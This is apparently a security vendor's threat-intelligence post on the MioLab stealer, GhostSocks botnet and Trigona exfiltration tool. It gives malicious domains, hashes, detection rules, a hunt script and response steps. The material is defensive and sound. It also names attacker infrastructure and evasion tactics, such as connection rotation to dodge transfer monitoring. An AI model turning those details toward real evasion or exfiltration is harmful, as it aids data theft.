Back to Intelligence

MioLab Stealer, GhostSocks Proxy Botnet, and Trigona Exfil Tool: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
May 4, 2026
5 min read

Threat Summary

Recent OTX pulse data highlights a concerning convergence of Malware-as-a-Service (MaaS) platforms targeting distinct vectors for financial gain and data theft. We are tracking three distinct active campaigns:

  1. MioLab (Nova): A macOS-centric stealer ecosystem aggressively marketed on Russian underground forums, focusing on cryptocurrency wallet extraction.
  2. GhostSocks: A Golang-based proxy botnet that converts infected devices into residential proxy nodes, often distributed alongside Lumma Stealer to evade detection via TLS-encrypted SOCKS5 tunnels.
  3. Trigona: A ransomware affiliate group utilizing a custom exfiltration tool, uploader_client.exe, replacing standard utilities like Rclone to bypass network monitoring through parallel streaming and connection rotation.

Collectively, these campaigns indicate a shift toward specialized tooling designed to bypass standard EDR and network perimeter defenses.

Threat Actor / Malware Profile

MioLab (Nova) Stealer

  • Type: macOS Stealer (MaaS)
  • Distribution: Advertised on Russian-speaking forums; suspected delivery via "ClickFix" social engineering or malicious browser extensions.
  • Behavior: Targets browser credentials, cookies, and over 200 cryptocurrency extensions/wallets.
  • C2/Infrastructure: Uses bulletproof hosting infrastructure with specific domain patterns for data exfiltration.

GhostSocks

  • Type: Residential Proxy Botnet / Stealer Loader
  • Language: GoLang
  • Behavior: Establishes SOCKS5 proxies on infected hosts; uses TLS encryption to blend malicious traffic with legitimate web traffic. Partners with Lumma Stealer for dual-payload monetization.
  • Evasion: Utilizes residential proxy IPs to hide attacker origin, making geo-blocking and IP reputation checks less effective.

Trigona Affiliates

  • Type: Ransomware / Extortion
  • Tooling: Custom Go-based exfiltration tool (uploader_client.exe).
  • Behavior: Implements parallel data streams (5 connections) and rotates connections every 2,048 MB to evade large-transfer detection heuristics.

IOC Analysis

The provided indicators of compromise (IOCs) consist primarily of C2 domains, hostnames, and binary hashes (MD5, SHA1, SHA256).

  • Domains (MioLab): mioisiskwowiwjowuwjwolab.club, officerelaxation.com, approve-me.com. These should be blocked immediately at the DNS layer.
  • Domains (GhostSocks): retreaw.click, w2.bruggebogeyed.site. Likely registration points or C2 handshakes.
  • File Hashes: Multiple hashes for uploader_client.exe (Trigona) and GhostSocks binaries.

Operational Guidance: SOC teams should load these hashes into EDR solutions for immediate scanning. Domains should be added to RPZ (Response Policy Zone) files and web proxy blocklists. The presence of these hashes on non-Windows devices should be investigated for potential cross-platform compilation or false positives, though MioLab is specific to macOS.

Detection Engineering

Sigma Rules

YAML
title: Potential MioLab Stealer C2 Connection
id: 8a1b2c3d-4e5f-6789-0123-456789abcdef
description: Detects network connections to known MioLab Stealer C2 infrastructure domains.
status: experimental
date: 2026/05/04
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6635a7b2c422830e00b3e1d0
tags:
    - attack.credential_access
    - attack.exfiltration
logsource:
    category: network_connection
    product: macos
detection:
    selection:
        destination|contains:
            - 'mioisiskwowiwjowuwjwolab.club'
            - 'officerelaxation.com'
            - 'approve-me.com'
            - 'marinemember.com'
    condition: selection
falsepositives:
    - Unknown
level: high
---
title: GhostSocks Proxy Activity
id: 9b2c3d4e-5f6a-7890-1234-567890abcdef
description: Detects processes initiating connections to known GhostSocks infrastructure or suspicious high-volume proxy ports.
status: experimental
date: 2026/05/04
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6635a7b2c422830e00b3e1d1
tags:
    - attack.command_and_control
    - attack.defense_evasion
logsource:
    category: network_connection
    product: windows
detection:
    selection_domain:
        destination|contains:
            - 'retreaw.click'
            - 'bruggebogeyed.site'
    selection_proxy:
        destination.port in range:
            - 1080
            - 1081
            - 1082
    condition: 1 of selection_*
falsepositives:
    - Legitimate SOCKS proxy usage
level: medium
---
title: Trigona Custom Exfiltration Tool Execution
id: 0c3d4e5f-6a7b-8901-2345-678901bcdefg
description: Detects execution of the custom uploader_client.exe used by Trigona affiliates.
status: experimental
date: 2026/05/04
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6635a7b2c422830e00b3e1d2
tags:
    - attack.exfiltration
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\uploader_client.exe'
        Hashes|contains:
            - 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'
            - '816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019'
    condition: selection
falsepositives:
    - Legitimate internal uploader tool (verify hash)
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Trigona Custom Uploader and GhostSocks Domains
let TrigonaHashes = dynamic(["e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173", "816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019"]);
let GhostSocksDomains = dynamic(["retreaw.click", "bruggebogeyed.site"]);
let MioLabDomains = dynamic(["mioisiskwowiwjowuwjwolab.club", "officerelaxation.com", "approve-me.com"]);
// 1. Process Creation for Trigona Tool
DeviceProcessEvents
| where InitiatingProcessFileName =~ "uploader_client.exe" or SHA256 in TrigonaHashes
| project Timestamp, DeviceName, FileName, ProcessCommandLine, SHA256
| union (
    // 2. Network Connections to GhostSocks
    DeviceNetworkEvents
    | where RemoteUrl has_any (GhostSocksDomains) or RemoteUrl has_any (MioLabDomains)
    | project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
)

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for Trigona Uploader and MioLab/GhostSocks Indicators.
.DESCRIPTION
    Checks processes and DNS cache for known IOCs from the OTX Pulse.
#>

$TrigonaHashes = @(
    "e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173",
    "816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019"
)

$MaliciousDomains = @(
    "mioisiskwowiwjowuwjwolab.club",
    "officerelaxation.com",
    "approve-me.com",
    "retreaw.click",
    "bruggebogeyed.site"
)

Write-Host "[+] Hunting for Trigona uploader_client.exe processes..." -ForegroundColor Cyan
$processes = Get-Process | Where-Object { $_.ProcessName -eq "uploader_client" }

if ($processes) {
    foreach ($proc in $processes) {
        Write-Host "[!] ALERT: Found uploader_client.exe running (PID: $($proc.Id))" -ForegroundColor Red
        try {
            $fileHash = (Get-FileHash -Path $proc.Path -Algorithm SHA256 -ErrorAction Stop).Hash
            if ($fileHash -in $TrigonaHashes) {
                Write-Host "[!!!] CRITICAL: Hash matches known Trigona Exfil Tool: $fileHash" -ForegroundColor Red
            }
        } catch {
            Write-Host "[-] Could not calculate hash for $($proc.Path)" -ForegroundColor DarkYellow
        }
    }
} else {
    Write-Host "[-] No uploader_client.exe processes found." -ForegroundColor Green
}

Write-Host "[+] Checking DNS Cache for malicious domains..." -ForegroundColor Cyan
$dnsCache = Get-DnsClientCache | Where-Object { $MaliciousDomains -contains $_.Data }

if ($dnsCache) {
    Write-Host "[!] ALERT: Found malicious domain entries in DNS Cache:" -ForegroundColor Red
    $dnsCache | Format-Table Entry, Data, TimeToLive
} else {
    Write-Host "[-] No malicious domains found in local DNS cache." -ForegroundColor Green
}

Response Priorities

  • Immediate:
    • Block all listed IOCs (Domains and Hashes) at the firewall, proxy, and EDR levels.
    • Isolate any endpoints identified as running uploader_client.exe or connecting to GhostSocks domains.
  • 24 Hours:
    • Initiate credential resets for high-privilege users on macOS devices, as MioLab actively targets browser credentials.
    • Review network logs for large data transfers consistent with Trigona's 2,048 MB rotation pattern.
  • 1 Week:
    • Implement egress filtering to block unauthorized SOCKS5 proxy traffic.
    • Enhance macOS endpoint monitoring for unsigned binaries and persistent LaunchAgents.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwaremiolab-stealerghostsocks-malwaretrigona-ransomwarecredential-theftmacos-threats

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action